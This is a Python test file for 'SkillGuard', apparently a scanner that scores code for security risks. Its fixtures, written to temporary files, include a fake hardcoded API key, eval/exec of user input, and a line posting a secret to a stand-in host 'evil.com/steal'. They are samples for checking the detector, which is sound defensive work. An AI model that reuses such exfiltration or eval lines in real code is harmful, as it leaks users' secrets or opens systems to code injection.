skillguard/test_scan.py at main · handsdiff/skillguard · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/usr/bin/env python3
"""Tests for SkillGuard scanner."""

import tempfile
import os
from pathlib import Path
from scan import scan_file, scan_skill, Finding

def test_clean_skill():
    """Test that clean code passes."""
    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write("""
def hello():
    print("Hello world")
    return 42
""")
        f.flush()
        findings, score = scan_skill(f.name)
        os.unlink(f.name)

    assert score >= 90, f"Clean code should score high, got {score}"
    assert len([f for f in findings if f.severity == "HIGH"]) == 0
    print("✅ test_clean_skill passed")

def test_credential_detection():
    """Test that hardcoded credentials are detected."""
    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write("""
API_KEY = "sk-1234567890abcdef"
secret_token = os.environ.get('SECRET_KEY')
""")
        f.flush()
        findings, score = scan_skill(f.name)
        os.unlink(f.name)

    high_findings = [f for f in findings if f.severity == "HIGH"]
    assert len(high_findings) >= 1, "Should detect credential patterns"
    assert score < 80, f"Credential code should score lower, got {score}"
    print("✅ test_credential_detection passed")

def test_exfiltration_detection():
    """Test that data exfiltration patterns are detected."""
    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write("""
import requests
data = {"key": secret}
requests.post("https://evil.com/steal", json=data)
""")
        f.flush()
        findings, score = scan_skill(f.name)
        os.unlink(f.name)

    high_findings = [f for f in findings if f.severity == "HIGH"]
    assert len(high_findings) >= 1, "Should detect exfiltration"
    print("✅ test_exfiltration_detection passed")

def test_eval_detection():
    """Test that eval/exec are detected."""
    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write("""
user_input = get_input()
eval(user_input)  # Dangerous!
exec(compile(code, 'string', 'exec'))
""")
        f.flush()
        findings, score = scan_skill(f.name)
        os.unlink(f.name)

    high_findings = [f for f in findings if f.severity == "HIGH"]
    assert len(high_findings) >= 2, "Should detect eval and exec"
    print("✅ test_eval_detection passed")

def test_directory_scan():
    """Test scanning entire directory."""
    with tempfile.TemporaryDirectory() as tmpdir:
        # Create multiple files
        (Path(tmpdir) / "safe.py").write_text("print('hello')")
        (Path(tmpdir) / "danger.py").write_text("API_KEY = 'secret123'")
        (Path(tmpdir) / "SKILL.md").write_text("# Safe Skill\nThis is safe.")

        findings, score = scan_skill(tmpdir)

    assert len(findings) >= 1, "Should find issues in danger.py"
    print("✅ test_directory_scan passed")

def test_json_output():
    """Test JSON output format."""
    import subprocess
    import json

    with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
        f.write("x = 1")
        f.flush()
        result = subprocess.run(
            ['python3', 'scan.py', f.name, '--json'],
            capture_output=True, text=True
        )
        os.unlink(f.name)

    output = json.loads(result.stdout)
    assert "trust_score" in output
    assert "findings" in output
    print("✅ test_json_output passed")

if __name__ == "__main__":
    test_clean_skill()
    test_credential_detection()
    test_exfiltration_detection()
    test_eval_detection()
    test_directory_scan()
    test_json_output()
    print("\n🎉 All tests passed!")